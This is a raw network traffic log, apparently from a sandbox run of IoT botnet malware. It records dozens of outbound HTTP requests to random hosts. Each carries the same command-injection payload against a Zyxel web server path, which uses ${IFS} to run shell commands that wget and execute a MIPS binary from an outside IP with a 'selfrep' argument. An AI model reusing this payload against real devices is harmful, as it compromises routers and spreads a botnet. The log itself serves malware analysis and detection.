                                            Feb 2, 2024 06:21:32.024034023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9289192.168.2.1534350196.220.194.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024072886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9290192.168.2.1557250198.65.44.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024137974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9291192.168.2.1552782103.114.65.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024144888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9292192.168.2.154202041.75.176.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024210930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9293192.168.2.1555506101.33.77.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024224043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9294192.168.2.15596524.156.131.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024255037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9295192.168.2.153687074.237.95.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024312973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9296192.168.2.1554592164.163.46.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024337053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9297192.168.2.15379068.109.149.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024365902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9298192.168.2.154132482.59.183.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024440050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9299192.168.2.1552078153.62.16.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024465084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9300192.168.2.1545022170.106.184.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024502039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9301192.168.2.154172292.66.83.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024563074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9302192.168.2.1532930119.88.65.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024600983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9303192.168.2.1553620194.179.241.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024626017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9304192.168.2.1542034134.8.27.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024672031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9305192.168.2.1552090162.169.247.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024713039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9306192.168.2.1542820116.41.126.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024765968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9307192.168.2.1543568128.123.106.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024806023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9308192.168.2.154820449.155.214.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024826050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9309192.168.2.155187465.33.245.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024872065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9310192.168.2.1550994113.96.80.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024897099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9311192.168.2.153528060.6.48.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024934053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9312192.168.2.1558358125.53.41.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024959087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9313192.168.2.1560230200.26.218.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025023937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9314192.168.2.1558148129.14.111.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025075912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9315192.168.2.1536322112.205.7.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025109053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9316192.168.2.1538028192.85.205.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025146008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9317192.168.2.1556146149.221.30.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025177956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9318192.168.2.1551010126.29.245.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025227070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9319192.168.2.1547642203.167.101.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025252104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9320192.168.2.1541050139.37.48.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025336981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9321192.168.2.1537096106.48.38.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025369883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9322192.168.2.1553588115.182.205.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025381088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9323192.168.2.1558224135.33.16.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025403976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9324192.168.2.1533098181.60.95.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025479078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9325192.168.2.1558666141.158.120.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025512934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9326192.168.2.154358271.98.139.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025546074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9327192.168.2.1558082157.234.88.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025588989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9328192.168.2.1539060164.160.38.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025624037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9329192.168.2.1553068195.206.142.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025685072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9330192.168.2.1536520147.112.65.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025721073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9331192.168.2.1549098223.190.166.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025774002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9332192.168.2.1549894193.94.2.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025780916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9333192.168.2.1548446134.46.233.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025820017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9334192.168.2.1552156193.139.165.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025870085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9335192.168.2.155418241.83.171.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025904894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9336192.168.2.155512427.163.219.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025930882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9337192.168.2.1559332111.229.100.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.025976896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9338192.168.2.1546630151.133.24.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026035070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9339192.168.2.154715013.131.5.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026067972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9340192.168.2.1549462115.116.235.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026101112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9341192.168.2.1536738138.80.132.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026149035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9342192.168.2.1548634219.71.239.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026190996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9343192.168.2.155134484.218.146.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026231050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9344192.168.2.155456665.206.8.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026264906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9345192.168.2.1548616190.247.0.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026313066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9346192.168.2.153420239.55.56.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026360035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9347192.168.2.1559154131.131.219.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026386023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9348192.168.2.1560954143.99.20.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026458979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9349192.168.2.1537488176.23.228.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026473999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9350192.168.2.1547502146.104.63.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026510954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9351192.168.2.15339989.131.126.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026540995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9352192.168.2.1540880162.255.141.137443
                                            TimestampBytes transferredDirectionData
